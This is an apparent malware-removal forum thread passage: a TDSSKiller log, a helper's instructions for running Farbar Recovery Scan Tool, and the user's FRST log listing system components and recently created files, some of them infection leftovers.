19:28:49.0562 0x0744  RasAuto - ok
19:28:49.0569 0x0744  [ D9F91EAFEC2815365CBE6D167E4E332A, 8350457A39D141C13807E7DB5A8D4113197C4016F7744B9993391F4AEA0C4A5C ] Rasl2tp         C:\Windows\system32\DRIVERS\rasl2tp.sys
19:28:49.0572 0x0744  Rasl2tp - ok
19:28:49.0609 0x0744  [ CB9E04DC05EACF5B9A36CA276D475006, 4D8C0AEF1D4F84F375AD2BAF786C9F6C52316A3E655B913449E71AD7C0FCA56E ] RasMan          C:\Windows\System32\rasmans.dll
19:28:49.0619 0x0744  RasMan - ok
19:28:49.0644 0x0744  [ 0FE8B15916307A6AC12BFB6A63E45507, 64119474DE7499E6E8B82E78BBD50074B3AA70B3E8329089FAE9B7F29919004E ] RasPppoe        C:\Windows\system32\DRIVERS\raspppoe.sys
19:28:49.0647 0x0744  RasPppoe - ok
19:28:49.0656 0x0744  [ 44101F495A83EA6401D886E7FD70096B, 56A0CE5C89870752B9B2AB795C1A248CA28209E049B2F20CCA0308CBE2488A0A ] RasSstp         C:\Windows\system32\DRIVERS\rassstp.sys
19:28:49.0659 0x0744  RasSstp - ok
19:28:49.0700 0x0744  [ D528BC58A489409BA40334EBF96A311B, C71E9A4B101DB6C3183B9F97B9098D73D6FE1B12C05C2EB3CE8A8041BEE6BA61 ] rdbss           C:\Windows\system32\DRIVERS\rdbss.sys
19:28:49.0709 0x0744  rdbss - ok
19:28:49.0715 0x0744  [ 0D8F05481CB76E70E1DA06EE9F0DA9DF, 2AFCBE3237D27AFBF095F91F1FCCA63E6890F34A9E4F00E5C34C92394CDA89FB ] rdpbus          C:\Windows\system32\DRIVERS\rdpbus.sys
19:28:49.0716 0x0744  rdpbus - ok
19:28:49.0722 0x0744  [ 23DAE03F29D253AE74C44F99E515F9A1, 8FED93D10B2062F0526FE3508101F8FCF8F72DEB90AFB472EB7CBAE83A0EC430 ] RDPCDD          C:\Windows\system32\DRIVERS\RDPCDD.sys
19:28:49.0723 0x0744  RDPCDD - ok
19:28:49.0759 0x0744  [ B973FCFC50DC1434E1970A146F7E3885, BE797E5F5AE34D37F8DA1134CE94DD14DBE36D2BC405B97E992E2257848B7CA9 ] RDPDR           C:\Windows\system32\drivers\rdpdr.sys
19:28:49.0769 0x0744  RDPDR - ok
19:28:49.0792 0x0744  [ 5A53CA1598DD4156D44196D200C94B8A, 8112FE14FEC94C67B1C5BDE4171E37584F1D0098D2C557C9E4BDD3E0291E25E4 ] RDPENCDD        C:\Windows\system32\drivers\rdpencdd.sys
19:28:49.0794 0x0744  RDPENCDD - ok
19:28:49.0802 0x0744  [ 44B0A53CD4F27D50ED461DAE0C0B4E1F, CDA80B08E67AD034081C0C920CD66147689F1844403CBC552F65005E7C011A91 ] RDPREFMP        C:\Windows\system32\drivers\rdprefmp.sys
19:28:49.0804 0x0744  RDPREFMP - ok
19:28:49.0840 0x0744  [ 68A0387F58E226DEEE23D9715955572A, F95BB1D2BB3E79AF47B1C715BB5E3003EEF888AAA963F46F4A2FE8AFBD4F37A4 ] RdpVideoMiniport C:\Windows\system32\drivers\rdpvideominiport.sys
19:28:49.0842 0x0744  RdpVideoMiniport - ok
19:28:49.0851 0x0744  [ 288B06960D78428FF89E811632684E20, 82FB13C2749637E172381C9C205080921A45453191B6246C5D3FE946A06D17F5 ] RDPWD           C:\Windows\system32\drivers\RDPWD.sys
19:28:49.0856 0x0744  RDPWD - ok
19:28:49.0899 0x0744  [ 518395321DC96FE2C9F0E96AC743B656, 5F6A0880B4F3EE7196259EA362DA9554B0687B0236F9A8E5CF7A4A77F01F1776 ] rdyboost        C:\Windows\system32\drivers\rdyboost.sys
19:28:49.0904 0x0744  rdyboost - ok
19:28:49.0936 0x0744  [ 7B5E1419717FAC363A31CC302895217A, 048B96B127CC20833948DAE53C59886D5C725ECA7A744424A01339447D2DDC32 ] RemoteAccess    C:\Windows\System32\mprdim.dll
19:28:49.0941 0x0744  RemoteAccess - ok
19:28:49.0968 0x0744  [ CB9A8683F4EF2BF99E123D79950D7935, B9FA3E7E91E76D975CF40BFA37909E50F29CC13AB1399007884710651827E9AA ] RemoteRegistry  C:\Windows\system32\regsvc.dll
19:28:49.0973 0x0744  RemoteRegistry - ok
19:28:49.0990 0x0744  [ CB928D9E6DAF51879DD6BA8D02F01321, DFD263B67DDF98AE09AF6D6986CBC7BE3206BCE8403AAC51BCF9459E78233D12 ] RFCOMM          C:\Windows\system32\DRIVERS\rfcomm.sys
19:28:49.0994 0x0744  RFCOMM - ok
19:28:50.0025 0x0744  [ 78D072F35BC45D9E4E1B61895C152234, 80C924EE1156B4E3172E83DCB9C60817E87885FB9377647E0BF90153E415B1CA ] RpcEptMapper    C:\Windows\System32\RpcEpMap.dll
19:28:50.0029 0x0744  RpcEptMapper - ok
19:28:50.0058 0x0744  [ 94D36C0E44677DD26981D2BFEEF2A29D, D77A93AC60536F3706E8A0154C0C2199E888B7748C84DB7437254FF175F4DF55 ] RpcLocator      C:\Windows\system32\locator.exe
19:28:50.0060 0x0744  RpcLocator - ok
19:28:50.0084 0x0744  [ 7660F01D3B38ACA1747E397D21D790AF, 04611B43705C064C2A8331F6D3F8E4530295694AE2C3E3EC3F62CFF4A5EFA88D ] RpcSs           C:\Windows\system32\rpcss.dll
19:28:50.0093 0x0744  RpcSs - ok
19:28:50.0144 0x0744  [ 032B0D36AD92B582D869879F5AF5B928, 0F8F18A6A0A689957B886D9368015889091094EDA18BE532093F06A70A7CE184 ] rspndr          C:\Windows\system32\DRIVERS\rspndr.sys
19:28:50.0147 0x0744  rspndr - ok
19:28:50.0181 0x0744  [ 7FA7F2E249A5DCBB7970630E15E1F482, 9633B193F3FDA67BC551C6DCA4788AB83E9F45F77763EE579D02FE5D6B80DEDF ] s3cap           C:\Windows\system32\drivers\vms3cap.sys
19:28:50.0183 0x0744  s3cap - ok
19:28:50.0200 0x0744  [ F42309C4191C506B71DB5D1126D26318, 29B0A8889857CEBFA6CBD795D5EECDDFFA04E794BD3C73FC488725B2A160F326 ] SamSs           C:\Windows\system32\lsass.exe
19:28:50.0203 0x0744  SamSs - ok
19:28:50.0224 0x0744  [ 05D860DA1040F111503AC416CCEF2BCA, DAE2F37D09A5A42F945BC8E27E4EA2303521081783A80CEE7FEE7C5A1C2CFC5E ] sbp2port        C:\Windows\system32\drivers\sbp2port.sys
19:28:50.0227 0x0744  sbp2port - ok
19:28:50.0260 0x0744  [ 8FC518FFE9519C2631D37515A68009C4, 21E10585470CF9FC3BD1977F8A426686CD2FA6BD2094B9E3594B21C7C4541D25 ] SCardSvr        C:\Windows\System32\SCardSvr.dll
19:28:50.0266 0x0744  SCardSvr - ok
19:28:50.0274 0x0744  [ 0693B5EC673E34DC147E195779A4DCF6, AF1B56FBF3ADABF94CD9DBA67586B8746DE135151F6B3D1B0EE315BC1E2DB670 ] scfilter        C:\Windows\system32\DRIVERS\scfilter.sys
19:28:50.0276 0x0744  scfilter - ok
19:28:50.0307 0x0744  [ A04BB13F8A72F8B6E8B4071723E4E336, E63287FF71C39CBF64C3347C455324C8437F9CF398153E269543588B65389502 ] Schedule        C:\Windows\system32\schedsvc.dll
19:28:50.0327 0x0744  Schedule - ok
19:28:50.0349 0x0744  [ 319C6B309773D063541D01DF8AC6F55F, 182F392FE839499D159A30A3CD04B5D0C87219930BFB1A7456880B7DA75B9820 ] SCPolicySvc     C:\Windows\System32\certprop.dll
19:28:50.0351 0x0744  SCPolicySvc - ok
19:28:50.0389 0x0744  [ 0328BE1C7F1CBA23848179F8762E391C, EA80853F04BAE6F46F658B3EFED34BFDDE20E6F2BDA349EBC17EC75DFF19855D ] sdbus           C:\Windows\system32\DRIVERS\sdbus.sys
19:28:50.0395 0x0744  sdbus - ok
19:28:50.0422 0x0744  [ 08236C4BCE5EDD0A0318A438AF28E0F7, 77727F963F63C4CEC11E7AAD5FB3836179701D512CA9436C3170B9E6A4E5F888 ] SDRSVC          C:\Windows\System32\SDRSVC.dll
19:28:50.0430 0x0744  SDRSVC - ok
19:28:50.0470 0x0744  [ 90A3935D05B494A5A39D37E71F09A677, F72733A69BC6E1A2BB91D7632FF3463C12563F60FDCC00A2CDD67FF20D479952 ] secdrv          C:\Windows\system32\drivers\secdrv.sys
19:28:50.0472 0x0744  secdrv - ok
19:28:50.0489 0x0744  [ A59B3A4442C52060CC7A85293AA3546F, 1776D6DEE51991149265AAF39E17065E301C5FA1FF4068653DC0010B9B27185D ] seclogon        C:\Windows\system32\seclogon.dll
19:28:50.0532 0x0744  seclogon - ok
19:28:50.0561 0x0744  [ DCB7FCDCC97F87360F75D77425B81737, F8289AF2C458C167038EEFE613EE5E3D6D5B3308B8784168374BC81C47891CE5 ] SENS            C:\Windows\System32\sens.dll
19:28:50.0567 0x0744  SENS - ok
19:28:50.0602 0x0744  [ 50087FE1EE447009C9CC2997B90DE53F, B5E6CF1D991F87C29C5E28198E0962E31FFB499A46C3BD43FC20391693389959 ] SensrSvc        C:\Windows\system32\sensrsvc.dll
19:28:50.0607 0x0744  SensrSvc - ok
19:28:50.0614 0x0744  [ 9AD8B8B515E3DF6ACD4212EF465DE2D1, E2F019BCD1446236D078D46065DD151DD068778F33BE2F1E8A0CC1EA2F954E86 ] Serenum         C:\Windows\system32\drivers\serenum.sys
19:28:50.0616 0x0744  Serenum - ok
19:28:50.0639 0x0744  [ 5FB7FCEA0490D821F26F39CC5EA3D1E2, A26DB2EB9F3E2509B4EBA949DB97595CC32332D9321DF68283BFC102E66D766F ] Serial          C:\Windows\system32\drivers\serial.sys
19:28:50.0642 0x0744  Serial - ok
19:28:50.0647 0x0744  [ 79BFFB520327FF916A582DFEA17AA813, 7A2A9D69BE02228591186A9F4453D4B5FD98837CA422C873C48040170E8BD18C ] sermouse        C:\Windows\system32\drivers\sermouse.sys
19:28:50.0649 0x0744  sermouse - ok
19:28:50.0671 0x0744  [ 4AE380F39A0032EAB7DD953030B26D28, C8F5F2DD59574E966FDF3057867BB959A554BAB6FD5DC6F1427094A6BC2B2809 ] SessionEnv      C:\Windows\system32\sessenv.dll
19:28:50.0677 0x0744  SessionEnv - ok
19:28:50.0681 0x0744  [ 9F976E1EB233DF46FCE808D9DEA3EB9C, 6A5C53F27F8BCA85CE206EE7D196176F67EC6FFA5D4830373A20792C149B5E75 ] sffdisk         C:\Windows\system32\drivers\sffdisk.sys
19:28:50.0683 0x0744  sffdisk - ok
19:28:50.0689 0x0744  [ 932A68EE27833CFD57C1639D375F2731, 11D6B98FBEEE2B9C7B06EF7091857BBD3B349077997D6261D66280668FD1B5C3 ] sffp_mmc        C:\Windows\system32\drivers\sffp_mmc.sys
19:28:50.0691 0x0744  sffp_mmc - ok
19:28:50.0696 0x0744  [ 6D4CCAEDC018F1CF52866BBBAA235982, AAC41F5C97B3FE5A3DC0838457EB8CC9BB71FCA16D3EDBB67D603F0A9D46C131 ] sffp_sd         C:\Windows\system32\drivers\sffp_sd.sys
19:28:50.0697 0x0744  sffp_sd - ok
19:28:50.0702 0x0744  [ DB96666CC8312EBC45032F30B007A547, C3AE60FC65A36E96E0D2CC6E184481D70F91A19DC3E2E17E2873DD670A592DD7 ] sfloppy         C:\Windows\system32\drivers\sfloppy.sys
19:28:50.0704 0x0744  sfloppy - ok
19:28:50.0727 0x0744  [ D1A079A0DE2EA524513B6930C24527A2, E2BC16DBCF38841EECD49C6FA1A9AC89C17F332F12606CA826F058E995E1B83D ] SharedAccess    C:\Windows\System32\ipnathlp.dll
19:28:50.0736 0x0744  SharedAccess - ok
19:28:50.0767 0x0744  [ 414DA952A35BF5D50192E28263B40577, 9C9BAFB9880DA6CC728506A142BE124E186219610DCC3460657A3CA93C865DF1 ] ShellHWDetection C:\Windows\System32\shsvcs.dll
19:28:50.0777 0x0744  ShellHWDetection - ok
19:28:50.0784 0x0744  [ 2565CAC0DC9FE0371BDCE60832582B2E, 1A775214E86B83C2F1799F12D71077D81C89AD32734A248BA88787B7F104B79D ] sisagp          C:\Windows\system32\drivers\sisagp.sys
19:28:50.0787 0x0744  sisagp - ok
19:28:50.0821 0x0744  [ A9F0486851BECB6DDA1D89D381E71055, 7E909538AB758C18AC2CCBFFEE17BA36FA6ED2E674AA70924AA87AC61375FF35 ] SiSRaid2        C:\Windows\system32\drivers\SiSRaid2.sys
19:28:50.0823 0x0744  SiSRaid2 - ok
19:28:50.0830 0x0744  [ 3727097B55738E2F554972C3BE5BC1AA, 75D52A596A298C33EC79A3B0B80F25492C08A182ABC679401502DA9597687566 ] SiSRaid4        C:\Windows\system32\drivers\sisraid4.sys
19:28:50.0832 0x0744  SiSRaid4 - ok
19:28:50.0846 0x0744  [ 3E21C083B8A01CB70BA1F09303010FCE, 803F8F91299C387110F34A49340E7136AAE91B418E2977A36285EA8F432FF197 ] Smb             C:\Windows\system32\DRIVERS\smb.sys
19:28:50.0848 0x0744  Smb - ok
19:28:50.0869 0x0744  [ 6A984831644ECA1A33FFEAE4126F4F37, 753E23D2B33D47C52C05D892B052CFD96D93B97FB6E9FCB58EF1E4C4A125BF78 ] SNMPTRAP        C:\Windows\System32\snmptrap.exe
19:28:50.0874 0x0744  SNMPTRAP - ok
19:28:50.0879 0x0744  [ 95CF1AE7527FB70F7816563CBC09D942, CE8BACB91A5A86CBCE82619C6C1873B4D7593B00CED3B522E41B8F7F6258CC65 ] spldr           C:\Windows\system32\drivers\spldr.sys
19:28:50.0880 0x0744  spldr - ok
19:28:50.0906 0x0744  [ 866A43013535DC8587C258E43579C764, B2BE846B5167A2ECD1E30C69A81385FCC6EAE6033394D08458A5583D311C4D82 ] Spooler         C:\Windows\System32\spoolsv.exe
19:28:50.0916 0x0744  Spooler - ok
19:28:58.0807 0x0744  Win FW state via NFP2: enabled ( trusted )
19:29:01.0504 0x0744  ============================================================
19:29:01.0504 0x0744  Scan finished
19:29:01.0504 0x0744  ============================================================
19:29:01.0524 0x07c0  Detected object count: 0
19:29:01.0524 0x07c0  Actual detected object count: 0
19:30:37.0304 0x0ee0  Deinitialize success
 


Great..! Let's run a few control scans so I can take one last look, and then we'll head toward the finish..! :)

Scan with Farbar Recovery Scan

  • Please download Farbar Recovery Scan Tool (choose the 32-bit or the 64-bit version according to your version of Windows) and save it to the desktop.
  • Run the file FRST.exe (or FRST64.exe).
  • The program will start. Press YES to agree to the license agreement.
  • Press the button [button image].
  • Wait patiently for the scan to finish.
  • Two log files named FRST.txt and Addition.txt will be created on the desktop.
  • Copy the contents of FRST.txt into your next post. Attach Addition.txt to your comment (see the Attach files option when you post a reply).

Logs

In your next reply, please include (by copying their entire contents) the following logs:

  • FRST.txt (copy the entire contents)
  • Addition.txt (attach it..)


Scan result of Farbar Recovery Scan Tool (FRST) (x86) Version: 01-01-2019
Ran by ВЕС (administrator) on WIN-SKFJ6HLGST2 (04-01-2019 19:43:03)
Running from C:\Users\ВЕС\Downloads
Loaded Profiles: ВЕС (Available Profiles: ВЕС)
Platform: Microsoft Windows 7 Ultimate  Service Pack 1 (X86) Language: English (United States)
Internet Explorer Version 8 (Default browser: Chrome)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
(Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\mbamtray.exe
(Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\MBAMWsc.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe

==================== Registry (Whitelisted) ===========================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION
HKLM\...\Drivers32: [MSVideo8] => C:\Windows\system32\VfWWDM32.dll [56832 2010-11-20] (Microsoft Corporation)
HKLM\Software\Microsoft\Active Setup\Installed Components: [>{60B49E34-C7CC-11D0-8953-00A0C90347FF}] -> C:\Windows\System32\iedkcs32.dll [2010-11-20] (Microsoft Corporation)
HKLM\Software\Microsoft\Active Setup\Installed Components: [{8A69D345-D564-463c-AFF1-A69D9E530F96}] -> C:\Program Files\Google\Chrome\Application\71.0.3578.98\Installer\chrmstp.exe [2019-01-03] (Google Inc.)

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Tcpip\Parameters: [DhcpNameServer] 192.168.0.1
Tcpip\..\Interfaces\{840DEA2A-8553-4D25-A5FB-7DB86C5BFBE5}: [DhcpNameServer] 192.168.0.1
Tcpip\..\Interfaces\{EE11610E-0BCC-42A7-A0AC-89B4A3B92BF1}: [DhcpNameServer] 192.168.0.1

Internet Explorer:
==================
HKU\S-1-5-21-3512987231-521144983-709920193-1000\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = hxxp://www.msn.com/en-xl/?ocid=iehp

FireFox:
========
FF ProfilePath: C:\Users\ВЕС\AppData\Roaming\K-Meleon\oytl87x0.default [2019-01-03]
FF user.js: detected! => C:\Users\ВЕС\AppData\Roaming\K-Meleon\oytl87x0.default\user.js [2006-04-06]
FF Extension: (NewsFox) - C:\Users\ВЕС\Downloads\k-meleon\browser\extensions\{899DF1F8-2F43-4394-8315-37F6744E6319}.xpi [2016-01-04] [Legacy] [not signed]
FF Plugin: @tools.google.com/Google Update;version=3 -> C:\Program Files\Google\Update\1.3.33.23\npGoogleUpdate3.dll [No File]
FF Plugin: @tools.google.com/Google Update;version=9 -> C:\Program Files\Google\Update\1.3.33.23\npGoogleUpdate3.dll [No File]

Chrome: 
=======
CHR HomePage: Default -> hxxp://google.bg/
CHR Profile: C:\Users\ВЕС\AppData\Local\Google\Chrome\User Data\Default [2019-01-04]
CHR Extension: (Lightshot (скрииншот инструмент)) - C:\Users\ВЕС\AppData\Local\Google\Chrome\User Data\Default\Extensions\mbniclmhobmnbdlbpiphghaielnnpgdp [2019-01-03]
CHR Extension: (Плащания в уеб магазина на Chrome) - C:\Users\ВЕС\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2019-01-03]
CHR Extension: (Chrome Media Router) - C:\Users\ВЕС\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2019-01-03]

==================== Services (Whitelisted) ====================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

S3 GoogleChromeElevationService; C:\Program Files\Google\Chrome\Application\71.0.3578.98\elevation_service.exe [375776 2018-12-12] (Google Inc.)
R2 MBAMService; C:\Program Files\Malwarebytes\Anti-Malware\mbamservice.exe [5073376 2018-09-19] (Malwarebytes)
S2 gupdate; "C:\Program Files\Google\Update\GoogleUpdate.exe" /svc [X]
S3 gupdatem; "C:\Program Files\Google\Update\GoogleUpdate.exe" /medsvc [X]

===================== Drivers (Whitelisted) ======================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R1 ESProtectionDriver; C:\Windows\system32\drivers\mbae.sys [129248 2018-12-04] (Malwarebytes)
R2 MBAMChameleon; C:\Windows\System32\Drivers\MbamChameleon.sys [172280 2019-01-04] (Malwarebytes)
R3 MBAMFarflt; C:\Windows\System32\DRIVERS\farflt.sys [106144 2019-01-04] (Malwarebytes)
R3 MBAMProtection; C:\Windows\System32\DRIVERS\mbam.sys [63760 2019-01-04] (Malwarebytes)
R3 MBAMSwissArmy; C:\Windows\System32\Drivers\mbamswissarmy.sys [230120 2019-01-04] (Malwarebytes)
R3 MBAMWebProtection; C:\Windows\System32\DRIVERS\mwac.sys [83648 2019-01-04] (Malwarebytes)
U3 TrueSight; \??\C:\Windows\System32\drivers\truesight.sys [X]
S3 VGPU; System32\drivers\rdvgkmd.sys [X]

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== One Month Created files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2019-01-04 19:28 - 2019-01-04 19:30 - 000186628 _____ C:\TDSSKiller.3.1.0.25_04.01.2019_19.28.10_log.txt
2019-01-04 19:27 - 2019-01-04 19:27 - 005073416 _____ (AO Kaspersky Lab) C:\Users\ВЕС\Downloads\tdsskiller.exe
2019-01-04 19:27 - 2019-01-04 19:27 - 000063760 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbam.sys
2019-01-04 19:26 - 2019-01-04 19:26 - 000230120 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbamswissarmy.sys
2019-01-04 19:26 - 2019-01-04 19:26 - 000106144 _____ (Malwarebytes) C:\Windows\system32\Drivers\farflt.sys
2019-01-04 19:26 - 2019-01-04 19:26 - 000083648 _____ (Malwarebytes) C:\Windows\system32\Drivers\mwac.sys
2019-01-04 18:55 - 2019-01-04 18:55 - 000463872 _____ C:\Windows\system32\LBA-0-128-k
2019-01-04 18:52 - 2019-01-04 18:52 - 000172280 _____ (Malwarebytes) C:\Windows\system32\Drivers\MbamChameleon.sys
2019-01-04 18:52 - 2019-01-04 18:52 - 000002020 _____ C:\Users\Public\Desktop\Malwarebytes.lnk
2019-01-04 18:52 - 2019-01-04 18:52 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes
2019-01-04 18:52 - 2018-12-04 08:09 - 000129248 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbae.sys
2019-01-04 18:51 - 2019-01-04 18:51 - 081227760 _____ (Malwarebytes ) C:\Users\ВЕС\Downloads\mb3-setup-consumer-3.6.1.2711-1.0.508-1.0.8211 (1).exe
2019-01-04 16:30 - 2019-01-04 16:30 - 000005319 _____ C:\Users\ВЕС\Documents\Fixlog.txt
2019-01-04 16:30 - 2019-01-04 16:30 - 000003620 _____ C:\Users\ВЕС\Documents\fixlist.txt
2019-01-04 03:15 - 2019-01-04 03:15 - 000001345 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Media Center.lnk
2019-01-04 03:15 - 2019-01-04 03:15 - 000001326 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows DVD Maker.lnk
2019-01-04 03:14 - 2019-01-04 03:14 - 000000000 ____H C:\Windows\system32\Drivers\Msft_User_WpdFs_01_09_00.Wdf
2019-01-04 03:10 - 2019-01-03 18:31 - 000000000 ____D C:\Windows\Panther
2019-01-04 03:03 - 2019-01-04 03:03 - 000000000 ____D C:\Windows.old
2019-01-03 20:43 - 2019-01-04 19:43 - 000005530 _____ C:\Users\ВЕС\Downloads\FRST.txt
2019-01-03 20:43 - 2019-01-04 19:43 - 000000000 ____D C:\FRST
2019-01-03 20:43 - 2019-01-03 20:43 - 001783808 _____ (Farbar) C:\Users\ВЕС\Downloads\FRST.exe
2019-01-03 20:03 - 2019-01-03 20:03 - 000000000 ____D C:\Users\ВЕС\AppData\Local\mbam
2019-01-03 20:02 - 2019-01-04 18:52 - 000000000 ____D C:\ProgramData\Malwarebytes
2019-01-03 20:02 - 2019-01-03 20:02 - 000000000 ____D C:\Users\ВЕС\AppData\Local\mbamtray
2019-01-03 20:02 - 2019-01-03 20:02 - 000000000 ____D C:\Program Files\Malwarebytes
2019-01-03 20:00 - 2019-01-03 20:01 - 081227760 _____ (Malwarebytes ) C:\Users\ВЕС\Downloads\mb3-setup-consumer-3.6.1.2711-1.0.508-1.0.8211.exe
2019-01-03 19:40 - 2019-01-03 19:40 - 029162424 _____ (Adlice Software ) C:\Users\ВЕС\Downloads\RogueKiller_setup.exe
2019-01-03 19:34 - 2019-01-04 16:29 - 000383916 _____ C:\Windows\ntbtlog.txt
2019-01-03 19:30 - 2019-01-03 19:30 - 000000000 ____H C:\Windows\system32\Drivers\Msft_User_WpdMtpDr_01_09_00.Wdf
2019-01-03 19:10 - 2019-01-03 19:10 - 006161408 _____ C:\Users\ВЕС\AppData\Local\dump007.dat
2019-01-03 19:09 - 2019-01-03 19:09 - 000000009 _____ C:\Users\ВЕС\rstr1.ini
2019-01-03 19:07 - 2019-01-03 19:07 - 000000258 __RSH C:\Users\ВЕС\ntuser.pol
2019-01-03 19:02 - 2019-01-03 19:02 - 000000000 ____D C:\Users\ВЕС\AppData\LocalLow\yHNPHHIzKpsCK
2019-01-03 19:01 - 2019-01-03 20:05 - 000000000 ____D C:\Users\ВЕС\AppData\Local\Michael
2019-01-03 19:01 - 2019-01-03 19:19 - 000000000 ____D C:\Users\ВЕС\AppData\Roaming\ShopMore
2019-01-03 19:01 - 2019-01-03 19:07 - 000002964 __RSH C:\ProgramData\ntuser.pol
2019-01-03 19:01 - 2019-01-03 19:01 - 000493800 _____ (VideoDriver) C:\Windows\D04DE5140B2D.sys
2019-01-03 19:01 - 2019-01-03 19:01 - 000140800 _____ C:\Users\ВЕС\AppData\Local\installer.dat
2019-01-03 19:01 - 2019-01-03 19:01 - 000000000 ____D C:\Users\ВЕС\AppData\Roaming\Python
2019-01-03 19:00 - 2019-01-03 20:05 - 000000000 ____D C:\Users\ВЕС\AppData\Roaming\ezc3lfxnx4j
2019-01-03 19:00 - 2019-01-03 19:00 - 000000003 _____ C:\Users\ВЕС\AppData\Local\wbem.ini
2019-01-03 19:00 - 2019-01-03 19:00 - 000000000 ____D C:\ProgramData\{AC10FE2E-1A46-0496-3E07-15883EE04CD9}
2019-01-03 19:00 - 2019-01-03 19:00 - 000000000 ____D C:\ProgramData\{59403C6F-D807-F1C6-7FC5-457D7F221C2C}
2019-01-03 18:57 - 2019-01-03 18:57 - 000008906 _____ C:\Users\NYBMYXMIG-DECRYPT.txt
2019-01-03 18:56 - 2015-08-03 08:53 - 000384000 _____ (SafeIP) C:\Windows\system32\SafeIPs.dll
2019-01-03 18:55 - 2019-01-03 20:05 - 000000000 ____D C:\Program Files\KMSPico 10.2.1 Final
2019-01-03 18:53 - 2018-12-10 23:04 - 000499424 ____N (Microsoft Corporation) C:\Windows\system32\MpSigStub.exe
2019-01-03 18:48 - 2019-01-03 18:48 - 001259736 _____ (Plarium) C:\Users\ВЕС\Downloads\PlariumPlaySetup (1).exe
2019-01-03 18:46 - 2019-01-03 18:46 - 000000000 ____D C:\Users\ВЕС\AppData\Local\Package Cache
2019-01-03 18:45 - 2019-01-03 19:03 - 000000000 ____D C:\Users\ВЕС\AppData\Roaming\Mozilla
2019-01-03 18:45 - 2019-01-03 18:45 - 000000000 ____D C:\Users\ВЕС\AppData\Roaming\K-Meleon
2019-01-03 18:45 - 2019-01-03 18:45 - 000000000 ____D C:\Users\ВЕС\AppData\Local\K-Meleon
2019-01-03 18:44 - 2019-01-03 18:44 - 000000000 ____D C:\Users\ВЕС\AppData\Local\Plarium
2019-01-03 18:44 - 2019-01-03 18:44 - 000000000 ____D C:\Users\ВЕС\AppData\Local\CEF
2019-01-03 18:39 - 2019-01-03 18:39 - 000000000 ____D C:\Users\ВЕС\AppData\Roaming\Google
2019-01-03 18:38 - 2019-01-03 19:53 - 000002202 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2019-01-03 18:38 - 2019-01-03 19:53 - 000002161 _____ C:\Users\Public\Desktop\Google Chrome.lnk
2019-01-03 18:37 - 2019-01-03 19:02 - 000000000 ____D C:\Program Files\Google
2019-01-03 18:37 - 2019-01-03 19:00 - 000000000 ____D C:\Users\ВЕС\AppData\Local\Google
2019-01-03 18:37 - 2019-01-03 18:37 - 000057560 _____ C:\Users\ВЕС\AppData\Local\GDIPFONTCACHEV1.DAT
2019-01-03 18:37 - 2019-01-03 18:37 - 000000000 ____D C:\Users\ВЕС\AppData\Local\Deployment
2019-01-03 18:37 - 2019-01-03 18:37 - 000000000 ____D C:\Users\ВЕС\AppData\Local\Apps\2.0
2019-01-03 18:36 - 2014-05-14 17:23 - 001973728 _____ (Microsoft Corporation) C:\Windows\system32\wuaueng.dll
2019-01-03 18:36 - 2014-05-14 17:23 - 000054240 _____ (Microsoft Corporation) C:\Windows\system32\wuauclt.exe
2019-01-03 18:36 - 2014-05-14 17:23 - 000045536 _____ (Microsoft Corporation) C:\Windows\system32\wups2.dll
2019-01-03 18:36 - 2014-05-14 17:17 - 002425856 _____ (Microsoft Corporation) C:\Windows\system32\wucltux.dll
2019-01-03 18:36 - 2014-05-14 09:23 - 000179656 _____ (Microsoft Corporation) C:\Windows\system32\wuwebv.dll
2019-01-03 18:36 - 2014-05-14 09:17 - 000033792 _____ (Microsoft Corporation) C:\Windows\system32\wuapp.exe
2019-01-03 18:33 - 2019-01-03 19:53 - 000001335 _____ C:\Users\ВЕС\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk
2019-01-03 18:33 - 2019-01-03 19:09 - 000000000 ____D C:\Users\ВЕС
2019-01-03 18:33 - 2019-01-03 18:33 - 000000020 ___SH C:\Users\ВЕС\ntuser.ini
2019-01-03 18:33 - 2019-01-03 18:33 - 000000000 ____D C:\Users\ВЕС\AppData\Local\VirtualStore
2019-01-03 18:33 - 2010-11-21 01:46 - 000000000 ____D C:\Users\ВЕС\AppData\Roaming\Media Center Programs
2019-01-03 16:27 - 2019-01-03 16:27 - 000000000 ____D C:\My Drivers
2018-12-30 08:50 - 2018-12-30 08:50 - 005183296 _____ (Marcin Szeniak ) C:\Users\ВЕС\Downloads\BCUninstaller_4.12.1_setup.exe
2018-12-29 13:35 - 2018-12-29 13:35 - 000000000 ____D C:\SWSetup

==================== One Month Modified files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

